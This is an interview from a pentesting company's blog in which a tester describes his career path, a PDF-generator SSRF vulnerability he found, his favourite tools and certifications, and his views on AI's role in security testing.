.svg){kind=icon}
.svg){kind=icon}
The Cobalt Pentester Spotlight highlights the fascinating journey of our Core members. Through an interview style, we share their experiences, background, and insights into the world of an accomplished pentester.
1. What's your handle? Do you use more than one? Where did it come from/ What's the origin story?
Until recently, I used the handle "spenkk", which was a childhood nickname that most of my friends used to call me. Lately, I’ve switched to "arbenn", which is simply a reference to my first name.
2. What got you into cybersecurity? How did you get into pentesting specifically?
My journey into cybersecurity started around 2010 when I first installed BackTrack Linux. I’m not sure exactly where I first heard about it, but while researching Wi-Fi hacking, someone recommended it. It ended up being the first Linux OS I installed and used.
A few years later, my interest grew, and I started exploring tools like Metasploit and Burp Suite, while also testing my skills on VulnHub machines. Eventually, a friend introduced me to HackTheBox, and I became completely hooked. Each machine and challenge taught me something new, and I kept pushing myself to improve. Reflecting on what I knew when I first joined this platform to then reaching the top ten all-time leaderboard just a few months later—it was a huge boost of confidence and motivation to keep improving in offensive security.
3. What exploit or clever attack are you most proud of and why?
Over the past few years, I have discovered several noteworthy vulnerabilities both on my own and in collaboration with colleagues. However, I may mention the most recent CVE-2024-53353, which I quickly discovered through source code analysis. In order to inject malicious payloads that could retrieve internal system files, this issue included manipulating a PDF generator and getting around its filter for specific payloads. To maximize the impact, I figured out a way to exploit the issue as a low-privileged user, demonstrating how an attacker could leverage it in a real-world scenario.
4. What is your go-to brag when talking about your pentesting skills?
I’ve found multiple high-impact vulnerabilities but in most cases, they were discovered using basic yet effective methods. One example from my pentesting experience at Cobalt was coming across multiple SSRF vulnerabilities in PDF generators. Some had existing PoCs, while others required me to craft bypass payloads to exploit them successfully.
Another interesting case was an SSTI vulnerability that occurred in an email inbox when a password reset request was made. To achieve full RCE, I had to bypass a sandbox restriction, which made the exploit particularly challenging but with critical impact at the end.
5. Share a time something went wrong in the course of a pentest? What happened and what did you do?
Similar to many experienced pentesters, I’ve had my share of “Oh no!” moments, although they’re pretty rare. One that comes to mind is accidentally locking high privileged accounts during a password-spraying attack. It’s one of those things that can happen despite careful tuning of delays and thresholds. Another was unintentionally overwriting data due to a missing access control issue, something that shouldn’t have been possible in the first place. These situations are always a learning experience, but they also highlight a bigger issue; many organizations don’t provide staging or dev environments for testing. When we’re forced to test in production with limited accounts and user roles, the risk of unexpected data manipulation across tenants or impacting business operations increases. Of course, when things go wrong, we immediately communicate with the client and work to mitigate any impact while ensuring they understand the underlying security gap that allowed it to happen in the first place.
6. What are your favorite tools or TTPs when conducting pentests? Why do you find them effective?
Although there are many great tools out there, my pentesting process would not be the same without Burp Suite and Ffuf (along with SecLists). I primarily use Ffuf for file/directory fuzzing and authorization bypassing (401/403), since it supports multiple wordlists at once. For network pentesting, I rely on Impacket, BloodHound, and Responder since I believe they’re crucial in infrastructure mapping, credential harvesting and code execution. Of course there are other awesome tools that enhance the process but I believe that these are the essentials.
7. What are your favorite asset types (web applications, APIs, network, etc.) to pentest and why?
I enjoy web application pentesting the most. I see web applications as the entry point to an organization’s infrastructure, so finding a critical vulnerability here can sometimes lead to fully compromising a company. An attacker could pivot from the web app to the internal network, escalate privileges, and perform lateral movement, making web security crucial. Lately, I’ve also developed an interest in thick client (desktop application) testing. Many of these applications rely on outdated libraries and insecure code, making them a great target. I find it especially fun to reverse engineer them and intercept the web or database traffic. There’s usually a lot of juicy information hidden in these interactions, which makes testing them both challenging and rewarding.
8. What certifications do you have? Why did you go for those ones specifically?
I currently have OSCP, BSCP, CARTP, and CREST. I wanted to get a certification per skill, so I went for OSCP for general pentesting, BSCP for web, and CARTP for Azure cloud. This year I plan to focus more on red teaming and get certified on CRTO or CRTL.
9. What advice do you wish someone had given you when you first started pentesting?
Offensive security has different specializations, like red teaming, application security, reverse engineering and vuln research, etc. It’s a good idea to research these areas and see which one fits best. If someone is interested in web application penetration testing, they should focus on becoming skilled in that area and learning the vulnerability categories in depth. Constantly switching between different fields can make it feel like progress is slow and give a feeling that you are not learning anything, which might even lead to burnout. It’s usually best to build a strong foundation in one area before exploring others.
10. How do you approach explaining findings to customers during a pentest? Is there a way you discuss your findings with customers? How do you ensure they have a quality experience?
I always strive to create high-quality proof of concepts with clear definitions, step-by-step instructions, and a detailed impact analysis. My goal is to help the customer understand not just what the vulnerability is, but how it could be exploited by a malicious actor and what the real-world consequences could be. When writing the PoC, I put myself in the customer’s shoes, whether it’s a software developer or an IT professional who may not be familiar with pentesting tools. I make sure the reproduction steps are as clear and easy to follow as possible, ensuring that even someone without deep security expertise can verify and address the issue. If I discover a high or critical severity vulnerability, I immediately notify the customer so they can take action as soon as possible, rather than waiting until the final report.
11. What is your favorite part of working with a pentesting team? What about working on your own?
When an application has many functionalities, I prefer working with a team of two or three people. This way, we can cover more app functionality and learn from each other. For example, there have been times when a colleague found a vulnerable endpoint, and I discovered related ones, or when a teammate found a limited XSS vulnerability, and I worked on bypassing the WAF to escalate it into a no-user-interaction exploit.
On the other hand, working alone has its advantages. You have a clear overview of what has been tested and what still needs to be covered. It also allows for more detailed updates and a focused testing approach.
12. Why do you like pentesting with Cobalt?
I've been with Cobalt for four years, and I’ve never thought about quitting or even taking a break. The entire process—from the start of a pentest to its completion—is smooth and well-structured. One of the things I appreciate is having direct communication with clients through the dedicated channel. This makes it easy to address blockers or clarify any scope-related questions in real-time.
I also like the Cobalt App, which simplifies reporting findings, tracking progress, and receiving feedback for improvement. It also makes re-engaging in retests seamless, which helps maintain efficiency and continuity in testing.
13. What do customers or the media often misunderstand about pentesters?
A common misunderstanding is that pentesters are like the hackers in movies, typing a few commands and instantly gaining access to a system. In reality, we are ethical hackers who follow a structured methodology based on the testing scenario. Our goal is to identify as many vulnerabilities as possible within the given time and scope. However, sometimes we don’t find high or critical severity issues, which can lead to customer disappointment because they expected major security flaws. In those cases, we emphasize that not finding severe vulnerabilities is actually a good sign, as it means their security posture is strong
14. How do you see pentesting changing in 2025 and over the next few years?
There's no doubt that AI will play a bigger role in pentesting, especially for repetitive and predictable tasks like input sanitization testing, access control checks, and reconnaissance. Automation will make these processes faster and more efficient, allowing pentesters to focus on more complex vulnerabilities. However, I don’t believe AI will fully replace human testers anytime soon, especially when it comes to business logic flaws and highly sensitive areas of an application or infrastructure. These types of vulnerabilities require critical thinking, creativity, and an understanding of context, which AI still struggles with. After all, why would anyone blindly trust an LLM to make security-critical decisions without human oversight? While AI will continue to enhance and accelerate certain aspects of pentesting, human expertise will remain essential for deep analysis, exploit chaining, and uncovering nuanced security risks that automation simply can't catch.
15. What's your p(Doom)?
I’d say my p(Doom) is pretty high, not necessarily because of some massive, world-ending cyber event, but because of how many organizations are already hacked and don’t even know it. In the current era, AI-driven attacks are evolving fast, making phishing, deepfakes, and automated exploitation way more effective. It takes a script kiddie with basic prompting knowledge to force an AI agent to create a professional phishing attack scenario. Meanwhile, a lot of companies still don’t take security seriously enough. They lack proper infosec teams, don’t invest in cybersecurity solutions and cyber hygiene, and often don’t have the right detection in place. Data exfiltration happens all the time, and attackers can sit in networks for months, even years, without anyone noticing. The scariest part isn’t just the attacks, it’s how many breaches go completely under the radar.
